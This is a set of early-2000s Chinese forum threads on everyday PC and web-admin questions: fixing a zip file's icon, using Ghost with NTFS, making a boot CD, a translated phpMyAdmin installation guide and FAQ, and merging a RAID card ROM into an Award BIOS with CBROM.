 发表于 2001-11-07 09:27:54 按此观看frankwuhong的个人资料 按此发邮件给frankwuhong 访问frankwuhong的主页 发送悄悄话给frankwuhong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看frankwuhong的IP
好用了，你把文件的后缀是css的，我搞糊涂了，我把css去掉就好用了

我总是和孤独的人一起孤独
http://www.lonelycat.tk
razor

初级用户
积分：30
发帖：15
来自：杭州
注册：2001-12-07
 发表于 2001-12-22 16:18:05 按此观看razor的个人资料 按此发邮件给razor 访问razor的主页 razor 的 oicq 是7605942,查看 7605942 的资料 发送悄悄话给razor 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看razor的IP
fontlist

我是Razor
上一贴 | 下一贴
快速回复 主题：对了,安装字体有什么软件可以预览字体吗?
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


zip文件的图标？ - 经 典 论 坛

计算机技术
zip文件的图标？

上一贴 | 下一贴
发表人 主题: zip文件的图标？
magicwind

终级用户
积分：773
发帖：199
来自：上海
注册：2001-07-13
 发表于 2001-12-25 15:34:01 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 收藏该主题供以后查看 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
图标变成windows标志，可还是能双击打开，该如何改过来？

欲穷千里目，更上一层楼。
樱

终级用户
积分：1308
发帖：401
来自：▓★☆★☆★▓
注册：2000-12-11
 发表于 2001-12-25 17:21:02 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP
重装

18J
[w]
ChilliChilli

初级用户
积分：0
发帖：8
来自：上海市
注册：2001-12-19
 发表于 2001-12-25 17:56:05 按此观看ChilliChilli的个人资料 按此发邮件给ChilliChilli 发送悄悄话给ChilliChilli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ChilliChilli的IP
一定要重装吗？为什么？

今天星期五。
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-25 18:14:18 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
可以重新建立文件关联

如果是Win98
先在zip文件图标上单击选择
然后按住shift键
在文件上单击右键
这样出现的菜单中会有“打开方式……”这个选项

之后从列表中找到WinZip
选中下方的“始终用此程序打开”选项
确定即可

如果简单一些的方法
那就是重装一遍WinZip

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
magicwind

终级用户
积分：773
发帖：199
来自：上海
注册：2001-07-13
 发表于 2001-12-25 18:23:41 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
打开方式试过了！
重装winzip倒可一试！

楼上的兄弟真让我佩服，发1000多贴，只有9分！

[这消息被magicwind编辑过(编辑时间2001-12-25 18:28:06)]

欲穷千里目，更上一层楼。
magicwind

终级用户
积分：773
发帖：199
来自：上海
注册：2001-07-13
 发表于 2001-12-25 18:55:32 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
谢谢，问题解决了！

欲穷千里目，更上一层楼。
天外飞猪

经典飞猪
积分：2196
发帖：909
来自：AnHui
注册：2001-11-16
 发表于 2001-12-25 19:03:18 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 访问天外飞猪的主页 天外飞猪 的 oicq 是131433,查看 131433 的资料 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
图标上点右键选择更改图标
magicwind

终级用户
积分：773
发帖：199
来自：上海
注册：2001-07-13
 发表于 2001-12-25 19:26:10 按此观看magicwind的个人资料 按此发邮件给magicwind magicwind 的 oicq 是25940990,查看 25940990 的资料 发送悄悄话给magicwind 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magicwind的IP
天外飞猪在上个帖子中说
引用:
图标上点右键选择更改图标

小飞猪呀！有这么一项吗？

欲穷千里目，更上一层楼。
凌志

终级用户
积分：544
发帖：166
来自：鞍山
注册：2001-01-09
 发表于 2001-12-25 20:27:00 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
治病要治本，解决问题也要解决 彻底，当然 有些办法可以达到目的，但是以后碰上这中事情难道也要重装吗？
在文件夹选项中改一下文件关联就行了！

网络天下
四海一家
POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-25 20:33:15 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
查错，重启

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

天外飞猪

经典飞猪
积分：2196
发帖：909
来自：AnHui
注册：2001-11-16
 发表于 2001-12-25 20:40:01 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 访问天外飞猪的主页 天外飞猪 的 oicq 是131433,查看 131433 的资料 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
magicwind在上个帖子中说
引用:
天外飞猪在上个帖子中说
引用:
图标上点右键选择更改图标

小飞猪呀！有这么一项吗？

呵呵，是我话没讲完，应该是点右键然后属性最后更改图标
樱

终级用户
积分：1308
发帖：401
来自：▓★☆★☆★▓
注册：2000-12-11
 发表于 2001-12-26 08:39:48 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP
天外飞猪在上个帖子中说
引用:
magicwind在上个帖子中说
引用:
天外飞猪在上个帖子中说
引用:
图标上点右键选择更改图标

小飞猪呀！有这么一项吗？

呵呵，是我话没讲完，应该是点右键然后属性最后更改图标

98中？？

18J
[w]
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2001-12-26 08:50:27 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
随便一个文件夹-----〉工具-----〉文件夹选项------〉文件类型------〉已注册文件类型选winzip 文件------〉高级------------〉更改图标

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：zip文件的图标？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


将磁盘格式转化为NTFS后还能使用Ghost吗？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
将磁盘格式转化为NTFS后还能使用Ghost吗？

上一贴 | 下一贴
发表人 | 主题: 将磁盘格式转化为NTFS后还能使用Ghost吗？
Ro 初级用户 积分：44 发帖：14 来自： 注册：2001-11-27 | 发表于 2001-12-26 16:52:19 按此观看Ro的个人资料 按此发邮件给Ro 收藏该主题供以后查看 发送悄悄话给Ro 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Ro的IP 我想换win2k,Ghost版本6.01
yuzhiqing 终级用户 积分：747 发帖：439 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-27 00:14:47 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 现在有7。0的版本，好象可以的 WINDFLASH ::浅紫色FORUM::
sunlxy 初级用户 积分：30 发帖：9 来自：Xiamen 注册：2000-03-04 | 发表于 2001-12-28 14:37:57 按此观看sunlxy的个人资料 按此发邮件给sunlxy 发送悄悄话给sunlxy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunlxy的IP 运行没有问题的，但是有个问题是 windows 2000 里的一些权限设置是跟 SID 有关的，而这个 SID 据说是全球唯一，不知道 GHOST 回来之后会不会出问题。我现在的机子就是从原来的机子 ghost 来的，没什么问题（自己用的，没做什么安全设置）。 可以在哭，可以在笑，就是不能不工作。
DayinNightout 超级用户 积分：345 发帖：152 来自：CCF 注册：2000-12-18 | 发表于 2001-12-29 15:45:20 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP 2000的基本上不会有什么问题，，，XP 的 NTFS 就有些麻烦了 木有签名#@$%
e路风尘 初级用户 积分：0 发帖：3 来自：苏州 注册：2001-12-29 | 发表于 2001-12-29 15:52:55 按此观看e路风尘的个人资料 按此发邮件给e路风尘 e路风尘 的 oicq 是3067555,查看 3067555 的资料 发送悄悄话给e路风尘 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看e路风尘的IP 好象不行 ghost可以认识NTFS；但找不到硬盘 也就是找不到你的备分
fjt 初级用户 积分：107 发帖：30 来自： 注册：2001-12-22 | 发表于 2001-12-29 22:34:34 按此观看fjt的个人资料 该用户不允许显示它的电子邮件 fjt 的 oicq 是8085563,查看 8085563 的资料 发送悄悄话给fjt 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fjt的IP 可以，没问题
imacwei 终级用户 积分：2344 发帖：1077 来自：China.Jiangs 注册：2001-07-23 | 发表于 2001-12-29 23:36:03 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP 找最新的版本，应该能够搞定了！ Loading………… WINDOWS2000-SP2+IE5.5 FIREWORKS,the solution for professional Web graphic design and production. Press Anykey To Continue… iMacWei
上一贴 | 下一贴
快速回复 主题：将磁盘格式转化为NTFS后还能使用Ghost吗？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


怎么制作启动光盘？ - 经 典 论 坛

计算机技术
怎么制作启动光盘？

上一贴 | 下一贴
发表人 | 主题: 怎么制作启动光盘？
blink 初级用户 积分：18 发帖：57 来自：南京 注册：2001-09-22 | 发表于 2001-12-30 18:22:35 按此观看blink的个人资料 按此发邮件给blink blink 的 oicq 是20092850,查看 20092850 的资料 收藏该主题供以后查看 发送悄悄话给blink 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blink的IP 也就是刻录的光盘能让机器boot from cd-rom？ 在痛苦中寻找快乐！
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-01 11:55:10 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 现在的刻录软件都具有这个功能，如 Nero 选择刻录类型：CD-Rom(Boot)，会要求你插入一张启动软盘
上一贴 | 下一贴
快速回复 主题：怎么制作启动光盘？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


php（夜猫下载系统）调试的问题 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
php（夜猫下载系统）调试的问题

上一贴 | 下一贴
发表人 主题: php（夜猫下载系统）调试的问题
flashdev

初级用户
积分：29
发帖：14
来自：
注册：2001-12-13
 发表于 2002-02-05 16:15:22 按此观看flashdev的个人资料 按此发邮件给flashdev 收藏该主题供以后查看 发送悄悄话给flashdev 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flashdev的IP
install.txt中有这样一段话：
##################################################
安装说明:
----------
- 0. 在安装此程序前, 请先阅读 readme.txt 和 install.php .

- 1. 请仔细配置好 include/config.inc.php 文件中各常规设置中的参数.

- 2. 将 sql-tables/ 目录下的四个数据表文件导入 MySQL 数据库.
(可使用 phpMyAdmin 来导入数据表)
###################################################

其中说到“可使用phpMyAdmin来导和数据表”，这个phpmyadmin是什么东东？怎样导入数据表？

好好学习，天天向上！
狗尾草

狗尾巴草
积分：1232
发帖：781
来自：极限世界
注册：2000-10-08
 发表于 2002-02-05 16:21:34 按此观看狗尾草的个人资料 按此发邮件给狗尾草 访问狗尾草的主页 狗尾草 的 oicq 是188936,查看 188936 的资料 发送悄悄话给狗尾草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看狗尾草的IP
是php写的mysql管理工具页面界面的，可以直接对mysql进行操作

夏天到了
自私的把一点轻松自在留给自己
在最喧闹的街头听着情歌
看看眼泪还是否会掉下来
夏天到了
我只想给夏天一个微笑.......
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-05 16:40:03 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
前言
    phpMyAdmin可以管理整个MySQL服务器(需要超级用户)，也可以管理单个数据库。为了实现后一种，你将需要合理设置MySQL用户，他只能对允许的数据库进行读/写。那要等到你看过MySQL手册中相关的部分。

快速安装

将phpMyAdmin软件包解到一个目录下。
打开config.inc.php3，根据你的环境，修改$cfgServers[1]["host"]，$cfgServers[1]["user"]和$cfgServers[1]["password"]的值。可以看一下下面的配置部分所列出的所有可配置的变量，根据情况对其它参数进行修改。
建议在安装完phpMyAdmin之后，对其目录进行保护(除非在一个企业内部网上)。例如，可以使用HTTP-AUTH(用一个.htaccess文件)。
在浏览器中打开文件:安装主机域名/安装目录/index.php3。phpMyAdmin应该显示一个欢迎屏和你的数据库。
phpMyAdmin支持多语言。如果要改成中文版本，则修改config.inc.php3中的require("english.inc.php3");为require("chinese_gb.inc.php3")。这样界面就是中文的了。

保存config.inc.php3。
安装注意
请确认保护了phpMyAdmin目录。缺省是没有任何保护的！它不应该被随便一个人特别是搜索引擎读到。
尽管我在每一页中都加了一个"nofollow"指令，也可能有的搜索引擎不考虑仍然继续访问页面的链接。
想象一下AltaVista访问了一个名叫"Drop Dtabase"的链接会怎么样吧。你可以在http://www.apacheweek.com/features/userauth对Apache的认证方法有一个全面了解。另一个教程在http://deepthought.texsci.edu/protected_dirs.html
PHP3应该被配置为magic_quotes=on。

配置
    所有可配置数据都放在config.inc.php3中。

$cfgServers 数组
    从1.4.2版本开始，phpMyAdmin支持对多个MySQL-server的管理。所以，增加了$cfgServers数组来存放不同服务器的登录信息。$cfgServers[1]["host"]包含了第一个服务器的主机名，$cfgServers[2]["host"]为第二个服务器的主机等，等等。如果你只有一个服务器要管理，可以简单地不去理会其它$cfgServers入口的主机名。

$cfgServers[n]["port"] 字符串
    第n个MySQL服务器的端口号。缺省值为3300(保留空值)。

$cfgServers[n]["host"] 字符串
    第n个MySQL服务器的主机名。例如，localhost。

$cfgServers[n]["adv_auth"] 布尔值
    对这个服务器应该使用基本或是高级认证方式。基本认证方式($adv_auth = false)是普通的老的作法：
用户名和口令被存在config.inc.php3中。高级认证方式($adv_auth = true)从1.3.0版开始引入，允许你通过HTTP-Auth来作为合法的MySQL的用户进行登录。在config.inc中你只需要提供一个标准用户，他能够连接到MySQL上并且可以读出mysql库的user/db表(看$cfgServers[n]["stduser"])。

推荐使用高级方式管理的场合：

当phpMyAdmin运行在多用户环境下，人们拥有shell处理权限时，你不想知道MySQL的用户名/口令。
当你想让用户存取他们自已的数据库，并且不想他们干扰其他人。
    高级认证方式是安全的，因为标准用户只需要对mysql库的只读权限。MySQL口令不能被容易的破解，所以对于一个普通用户没有机会看到其它用户的明文口令。

$cfgServers[n]["user"] 字符串
$cfgServers[n]["password"] 字符串
    当使用基本认证方式时，phpMyAdmin将使用用户名/口令对同这个MySQL服务器连接。当使用高级认证方式时则不需要。

$cfgServers[n]["stduser"] 字符串
$cfgServers[n]["stdpass"] 字符串
    当使用高级认证方式时，用户名/口令对被用于校验真正的用户名/口令对。这个用户必须能够连接MySQL，而且可以读取mysql库的user表。当使用基本认证方式时则不需要。

$cfgServers[n]["only_db"] 字符串
    如果设置了一个数据库名，只有这个数据库将显示给用户。

$cfgServers[n]["verbose"] 字符串
    只有在多服务器入口时使用phpMyAdmin才有用。如果设置了，这个字符串将被显示出来，用来代替在主页面中的下接菜单中的主机名。例如，如果你想在系统只显示某些数据库，这个可能就有用了。

$cfgManualBase 字符串
    如果设为一个URL(它指向MySQL文档)，就会创建相应的帮助链接。

$cfgPersistentConnections 布尔值
    是否使用持续连接(mysql_connect或mysql_pconnect)。

$cfgConfirm 布尔值
    当你将要丢失数据时是否应该显示一个警告信息("你真的确定要...")。

$cfgMaxRows 整数
    当浏览一个结果集时显示的记录数。如果结果集包含了更多的数据，将显示前页/后页的链接。

$cfgMaxInputsize 整数
    当向一个表增加一条新的记录时，编辑字段的大小。

$cfgBorder 整数
    表格边界的大小。

$cfgThBgcolor 字符串 [HTML 颜色]
    用在表头的颜色。

$cfgBgcolorOne 字符串 [HTML 颜色]
    表格行第一行的颜色。

$cfgBgcolorTwo 字符串 [HTML 颜色]
    表格行第二行的颜色。

$cfgOrder 字符串 ["DESC"|"ASC"]
    定义了当你点击字段名时，字段是以升序("ASC")显示还是以降序("DESC")显示。

$cfgShowBlob 布尔值
    定义了当浏览一个表的内容时，是否显示BLOB字段。

$cfgShowSQL 布尔值
    定义了是否显示phpMyAdmin所生成的sql查询语句。

$cfgColumnTypes 数组
    MySQL列的所有可能的类型。大多数情况下你不需要编辑它。

$cfgFunctions 数组
    MySQL支持函数的列表。大多数情况下你不需要编辑它。

$cfgAttributeTypes 数组
    字段可能的属性。大多数情况下你不需要编辑它。

FAQ - 常见问题
我不能向表中插入新记录 -- MySQL返回一个SQL错误。

    仔细检查SQL错误。我发现很多的程序员使用了错误的字段类型。普通的错误包括：

使用VARCHAR没有指定大小
使用TEXT或BLOB指定了大小
    另外，查看一下MySQL手册中的语法章节以确认你的语法是正确的。

phpMyAdmin不能连接MySQL。出了什么错？

     或者是PHP安装的问题或者是你的用户名/口令错了。试着编一个小的用了mysql_connect的脚本，看一下是否它能工作。如果不能，那就可能是还没有在PHP中将MySQL的编译进去。

我不能编辑表的内容，尽管README中说这是phpMyAdmin的一个特色。

    phpMyAdmin只允许编辑拥有主键或唯一键值的表的内容。

当使用高级认证管理时，phpMyAdmin总是给出"处理禁止(Access denied)"。

发生可能有几种原因：

$stduser/$stdpassword不正确。试着关掉$adv_auth，然后使用这个用户名及口令来连接MySQL。
在登录对话框中指定的用户名/口令是错的。试着用上面同样的方法看一下是否可以工作。
你已经给phpMyAdmin安装目录建立了安全机制，例如，.htaccess文件。这个可能干扰phpMyAdmin的认证管理，那么把它删除。
我想对phpMyAdmin的开发提供帮助。我应该如何进行？

下面的方法对于新的开发者来说是首选的：

取出在匿名CVS上的当前的CVS：
cvs -d :pserver:anon@www.htmlwizard.net:/usr/local/cvsroot login
[Password: phpMyAdmin]
cvs -d :pserver:anon@www.htmlwizard.net:/usr/local/cvsroot checkout phpMyAdmin
[这样将创建一个名为phpMyAdmin的新的子目录]
加入你的东西
将修改的文件发给我(tar格式或gzip格式) 对CVS树的写权限只授权给有经验的已经对phpMyAdmin作出
了贡献的开发者。

另外看一下DEVELOPERS文件。
有什么好的方法可以让phpMyAdmin更安全对付恶意的攻击？

    这要看你的系统了。如果你正在运行一个无法被其它人使用的服务器，使用web服务器的目录保护绑定就已经足够了(例如，对于Apache你可以使用.htaccess文件)。如果其它的人可以通过telnet存取你的服务器，将MySQL口令以明文形式保存在你的config.inc.php3 文件中就不是一个好方法了。在这种情况下你应该使用phpMyAdmin的高级认证方式功能。
如何才能向我的表中插入一个null值呢？

    输入"null"(没有引号)作为字段的的值。这个对于时间戳或自动增加字段特别有用。

我是一个ISP供应商。我可以安装一个主控的phpMyAdmin拷贝吗？或需要为每一个客户都安装一个？

     从2.0.3版本开始，你可以安装一个主控的phpMyAdmin拷贝为你的所有的用户。这个特性的开发是由NetCologne GmbH倡议的。这样就要求合理地设置MySQL用户，并且设置phpMyAdmin的高级认证方式。当认证一个用户时，phpMyAdmin执行这些步骤：

从mysql.user表中选出所有用户名/口令与申请用户相匹配的记录。如果没有记录被返回，认证失败。
否则，phpMyAdmin继续第2步。
如果用户的global Select_Priv是"N"(也就是用户不允许存取所有的数据库)，phpMyAdmin搜索mysql.db表，查找对于这个用户的Select_Priv="Y"的记录。如果没有记录被找到，认证失败。否则，phpMyAdmin显示所有允许用户查看的数据库。
如果用户的global Select_Priv是"Y"，系统中所有的数据库都显示出来。

    这就意味着你需要向mysql库中如下增加用户：

INSERT INTO user (Host, User, Password, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv) VALUES ("localhost", "foo", PASSWORD("bar"), "N", "N", "N", "N", "N", "N", "N", "N", "N", "N", "N", "N", "N", "N")
INSERT INTO db (Host, Db, User, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Grant_priv, References_priv, Index_priv, Alter_priv) VALUES ("localhost", "foo_db", "foo", "Y", "Y", "Y", "Y", "Y", "Y", "", "", "", "")

    那样，对于用户foo，只有"foo_db"库将被显示出来。

phpMyAdmin主页：http://www.htmlwizard.net/phpMyAdmin/

[这消息被话草编辑过(编辑时间2002-02-05 16:40:32)]

上一贴 | 下一贴
快速回复 主题：php（夜猫下载系统）调试的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


SOS - 经 典 论 坛

计算机技术
SOS

上一贴 | 下一贴
发表人 主题: SOS
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-02-21 21:25:01 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 收藏该主题供以后查看 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
请问。CBROM.EXE是做什么用的文件，那有下载的。急用。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-02-21 21:42:26 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
转贴

CBROM是一个专门修改Award BIOS文件的软件，它可以从主板的BIOS BIN文件里面提出或者加入文件。如果想知道CBROM的详细用法，可以通过DOS命令“cbrom /?”来请求帮助，查看其参数注解。

    下面，我们就来具体讨论一下它的用法：

    1.显示BIOS文件里面的内容

    命令格式为：CBROM.EXE (BIOS文件名).bin /D。比如BIOS文件名字为bf6.bin，则命令为：CBROM.EXE bf6.bin /D。

    2.提取BIOS文件里面的内容

    命令格式为：CBROM.EXE (BIOS文件名).bin /AAA extract，其中，AAA代表的是要提取的BIN文件的属性，有vga、pci、logo等等。比如我们要从bf6.bin里面提取vga.bin文件，则命令为：CBROM.EXE bf6.bin /vga extract，然后，需要按提示输入文件名，就可以把指定的内容取出。

    3.删除BIOS里面的指定文件

    命令格式为：CBROM.EXE (BIOS文件名).BIN /AAA RELEASE。其中，AAA代表需要删除的文件的属性。比如需要删除bf6.bin中的PCI设备文件，命令为：CBROM bf6.BIN /PCI RELEASE。

    4.把文件加入到BIOS里面

    命令格式为：CBROM.EXE (BIOS文件名).bin /AAA XXX.bin，同样的，AAA代表需要加入的BIN文件属性。比如RAID卡属于PCI设备，所以AAA就应该是pci，如果要把RAID.ROM文件加入到BF6.BIN中，命令为：CBROM.EXE bf6.bin /pci raid.bin。

    5.修改开机LOGO

    使用的是/LOGO /EPA参数。如CBROM bf6.BIN /LOGO BB.BMP。

等我想想再签
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-02-21 21:52:25 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
二、 Rocket133s使用方法：
    Rocket133s与Rocket133虽然在名称上只是少了一个s，但使用起来区别却比较大。最关键的原因是它板载没有BIOS，所以安装好Rocket133s后，开机并不会显示"Press<Ctrl><H>…"让用户察看安装情况。只有在我们进行了下面一个重要的步骤以后，它才能和上述的Rocket133（双通道卡）一样在各种操作系统下应用自如。这个重要的步骤就是合成BIOS，也就是将转接卡的BIOS合成到主板的BIOS中，借用主板的BIOS完成功能。
    如何将转接卡的BIOS合成到主板的BIOS中呢？我们以微星815EP主板为例来简单介绍一下操作步骤：
1〉 启动系统到DOS环境下。将award.exe、cbrom.exe、v12bios.rom（Rocket133s的BIOS）保存到A：下。
2〉 A:>award 保存主板原有的BIOS到A，命名为815EP.bin。
3〉 A:>cbrom 815EP.bin /PCI v12bios.rom 回车即可。
4〉 重新启动计算机，开机自检可以看到屏幕显示"Press<Ctrl><H>…"让用户察看安装情况。则说明BIOS已经成功的合成到主板的BIOS中，该卡可以直接在DOS环境下使用。
    有了以上的这一关键步骤，Rocket133s的驱动安装和Rocket133都是类似的，本文中就不再赘述了，我们把余下的成就感就留给热心的用户吧。

能否告诉我我该怎么做。我找不到CBROM这个文件那有呀！

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-02-21 21:54:38 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
我的主板是捷波9BXAN，刷BIOS用的软件是AWDFLASH，根据我的情况我该怎么办？请指教。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
